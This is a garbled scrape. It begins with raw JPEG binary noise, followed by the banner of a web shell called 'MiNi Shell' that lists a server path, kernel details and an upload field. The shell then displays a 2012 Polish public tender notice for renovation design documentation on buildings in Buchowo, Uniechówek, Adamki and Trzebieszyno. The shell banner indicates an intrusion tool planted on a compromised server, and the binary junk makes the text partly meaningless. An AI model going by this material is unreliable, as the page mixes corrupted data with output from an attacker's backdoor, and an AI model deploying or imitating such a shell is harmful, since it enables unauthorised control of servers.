JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/114126-N-2012.html

<p class="kh_header"><b>Pruszcz Gdański: Opracowanie dokumentacji na remont budynku w miejscowości Buchowo gm. Debrzno, Uniechówek gm. Debrzno, Adamki gm. Koczała, Trzebieszyno gm. Miastko</b><br>
<b>Numer ogłoszenia: 114126 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Gdańsku , ul. Powstańców Warszawy 28, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 3004841, 3023817, faks 058 3004843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji na remont budynku w miejscowości Buchowo gm. Debrzno, Uniechówek gm. Debrzno, Adamki gm. Koczała, Trzebieszyno gm. Miastko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1	Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku                        w miejscowości Buchowo nr 17, Buchowo nr 18,  Buchowo nr 19,  Buchowo nr 22, Uniechówek nr 5 gmina Debrzno, Adamki nr 1 gmina Koczała, Trzebieszyno nr 4 gmina Miastko.
     Przedmiot zamówienia został podzielony na cztery części w następujący sposób: 

Część 1- Zadanie nr 1:  

Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Buchowo nr 17, Buchowo nr 18 i Buchowo nr 19  gm Debrzno

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wymiana ślepej podłogi na poddaszu
e.	Założenie nowych rynien i rur spustowych
f.	Remont kominów 
g.	Ocieplenie budynku
h.	Remont pieców 
i.	Naprawa schodów zewnętrznych
j.	Wymiana drzwi zewnętrznych i wewnętrznych
k.	Wymiana stolarki okiennej
l.	Założenie nowych parapetów wewnętrznych i zewnętrznych
m.	Wymiana instalacji elektrycznej wewnętrznej
 



Część 2 - Zadanie nr 2: 

Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Buchowo nr 22 gm Debrzno

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wymiana ślepej podłogi na poddaszu
e.	Założenie nowych rynien i rur spustowych
f.	Remont kominów 
g.	Ocieplenie budynku
h.	Remont pieców 
i.	Naprawa schodów zewnętrznych
j.	Wymiana drzwi zewnętrznych i wewnętrznych
k.	Wymiana stolarki okiennej
l.	Założenie nowych parapetów wewnętrznych i zewnętrznych
m.	Wymiana instalacji elektrycznej wewnętrznej


Część 3 - Zadanie nr 3: 

Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Uniechówek nr 5 gm Debrzno

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wymiana ślepej podłogi na poddaszu
e.	Założenie nowych rynien i rur spustowych
f.	Remont kominów 
g.	Ocieplenie budynku
h.	Remont pieców 
i.	Naprawa schodów zewnętrznych
j.	Wymiana drzwi zewnętrznych i wewnętrznych
k.	Wymiana stolarki okiennej
l.	Założenie nowych parapetów wewnętrznych i zewnętrznych
m.	Wymiana instalacji elektrycznej wewnętrznej


Część 4 - Zadanie nr 4:

Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Adamki nr 1 gm Koczała i Trzebieszyno nr 4 gm Miastko

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wzmocnienie stropów
e.	Założenie nowych rynien i rur spustowych
f.	Modernizacja kominów ( dodatkowe kanały wentylacyjne) 
g.	Remont pieców 
h.	Remont pomieszczeń ( kuchni, pokoi)
i.	Modernizacja posadzek z ich ociepleniem
j.	Naprawa schodów wewnętrznych 
k.	Wymiana drzwi zewnętrznych wejściowych do budynku
l.	Wymiana drzwi wewnętrznych
m.	Wymiana stolarki okiennej
n.	Założenie nowych parapetów wewnętrznych i zewnętrznych
o.	Remont elewacji ( docieplenie budynku )
p.	Montaż instalacji wod-kan.
q.	Wymiana instalacji elektrycznej wewnętrznej
r.	Należy zaprojektować łazienki



4.2  Kontakt w sprawie przeprowadzenia wizji lokalnej - Administrator ANR GNiAZ WRSP w Bytowie - tel. (059) 822-20-68

4.3  Zamawiający dopuszcza do składania ofert częściowych. Wykonawca może złożyć ofertę na jedno, kilka lub na wszystkie zadania.
4.4  Dokumentację należy opracować po przeprowadzeniu wizji lokalnej.
4.5  Wykonawca zobowiązany jest do zamówienia i poniesienia kosztów map informacyjnych, ewidencyjnych i do celów projektowych dla projektowanego zadania.
4.6 Opracowanie dokumentacji projektowej musi być wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego.
4.7 Opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych musi być wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego.
4.8   Kosztorys inwestorski musi być wykonany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego,  obliczenia planowanych  kosztów  prac  projektowych  oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym.
4.9 Przedmiar robót musi być wykonany zgodnie z Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programem funkcjonalno - użytkowym.
4.10 Inwentaryzacja budowlana uproszczona musi zawierać:
	  1)  plan sytuacyjny obiektu 
2)  część opisową określającą charakterystykę budowlaną obiektu z podziałem na część użytkową i        nieużytkową;
3) część graficzną zawierającą rzuty kondygnacji wraz z obmiarami, (rzut kondygnacyjny Wykonawca zobowiązany jest do wykonania samodzielnie od podstaw).

4.11 Wykonawca przekaże Zamawiającemu dokumentację w następujących ilościach:
	1) projekt budowlany                                              - 3 egz. 
	2) przedmiar robót                                                  - 2 egz.
	3) specyfikacja techniczna wykonania i odbioru robót - 2 egz.
		4) kosztorys inwestorski                                          - 2 egz.
              5) inwentaryzacja                                                   - 2 egz.

4.12 Wykonawca zobowiązany jest do uzyskania stosownych pozwoleń i uzgodnień wymaganych w ustawie Prawo Budowlane, umożliwiających realizację zadania.
4.13 Wykonawca wyraża zgodę na umieszczenie przedmiotu zamówienia w sieci internetowej i jego powielanie dla potrzeb postępowania prowadzonego przez Zamawiającego w trybie ustawy Prawo zamówień publicznych.
4.14 Wykonawca zobowiązany jest ustalić z Zamawiającym dane wyjściowe do kosztorysowania.
4.15 Zamawiający wymaga sporządzenia dokumentacji i przekazania jej Zamawiającemu również w wersji elektronicznej w plikach PDF, która posłuży Zamawiającemu do ogłoszenia postępowania na roboty budowlane. Dokumentacja projektowa jest opisem przedmiotu zamówienia dlatego należy ją sporządzić zgodnie z art. 29 - 31 ustawy Prawo zamówień publicznych (tj. Dz. U. z 2010 r. Nr 113, poz.759)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie dokumentacje kubaturowe o wartości 5 000 złotych brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia do projektowania w specjalności:
-  Wykonawcy składający ofertę na zadanie nr 1, 2, 3 
a)  architektonicznej
      b)  konstrukcyjno-budowlanej
      c)  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
- Wykonawcy składający ofertę na zadanie nr 4
a)  architektonicznej
      b)  konstrukcyjno-budowlanej
      c)  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
      d)  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,  wodociągowych i kanalizacyjnych;
wydane zgodnie z przepisami obowiązującymi w chwili ich wydania oraz będącą członkiem odpowiedniej branżowej izby;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany druk Formularz oferty zgodny w treści z załącznikiem nr 1 do SIWZ.
W przypadku składania przez wykonawców oferty wspólnej w ofercie musi być zamieszczone pełnomocnictwo do reprezentowania Wykonawców ubiegających się wspólnie o zamówienie albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego lub umowa, jeżeli takie pełnomocnictwo wynika z umowy konsorcjum lub umowy spółki cywilnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 83-000 Pruszcz Gdański  ul. Powstańców Warszawy 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 11:00, miejsce: 83-000 Pruszcz Gdański,  ul. Powstańców Warszawy 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Buchowo nr 17, Buchowo nr 18 i Buchowo nr 19  gm Debrzno

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wymiana ślepej podłogi na poddaszu
e.	Założenie nowych rynien i rur spustowych
f.	Remont kominów 
g.	Ocieplenie budynku
h.	Remont pieców 
i.	Naprawa schodów zewnętrznych
j.	Wymiana drzwi zewnętrznych i wewnętrznych
k.	Wymiana stolarki okiennej
l.	Założenie nowych parapetów wewnętrznych i zewnętrznych
m.	Wymiana instalacji elektrycznej wewnętrznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Buchowo nr 22 gm Debrzno

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wymiana ślepej podłogi na poddaszu
e.	Założenie nowych rynien i rur spustowych
f.	Remont kominów 
g.	Ocieplenie budynku
h.	Remont pieców 
i.	Naprawa schodów zewnętrznych
j.	Wymiana drzwi zewnętrznych i wewnętrznych
k.	Wymiana stolarki okiennej
l.	Założenie nowych parapetów wewnętrznych i zewnętrznych
m.	Wymiana instalacji elektrycznej wewnętrznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Uniechówek nr 5 gm Debrzno

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wymiana ślepej podłogi na poddaszu
e.	Założenie nowych rynien i rur spustowych
f.	Remont kominów 
g.	Ocieplenie budynku
h.	Remont pieców 
i.	Naprawa schodów zewnętrznych
j.	Wymiana drzwi zewnętrznych i wewnętrznych
k.	Wymiana stolarki okiennej
l.	Założenie nowych parapetów wewnętrznych i zewnętrznych
m.	Wymiana instalacji elektrycznej wewnętrznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej, specyfikacji technicznego wykonania i odbioru robót, kosztorysu inwestorskiego, inwentaryzacji budowlanej uproszczonej na remont budynku w miejscowości Adamki nr 1 gm Koczała i Trzebieszyno nr 4 gm Miastko

Zakres opracowania dotyczy:
a.	Wzmocnienie konstrukcji dachu
b.	Wymiana pokrycia dachowego na blachodachówkę
c.	Wymiana ocieplenia z polepy na wełnę mineralną stropu piętra
d.	Wzmocnienie stropów
e.	Założenie nowych rynien i rur spustowych
f.	Modernizacja kominów ( dodatkowe kanały wentylacyjne) 
g.	Remont pieców 
h.	Remont pomieszczeń ( kuchni, pokoi)
i.	Modernizacja posadzek z ich ociepleniem
j.	Naprawa schodów wewnętrznych 
k.	Wymiana drzwi zewnętrznych wejściowych do budynku
l.	Wymiana drzwi wewnętrznych
m.	Wymiana stolarki okiennej
n.	Założenie nowych parapetów wewnętrznych i zewnętrznych
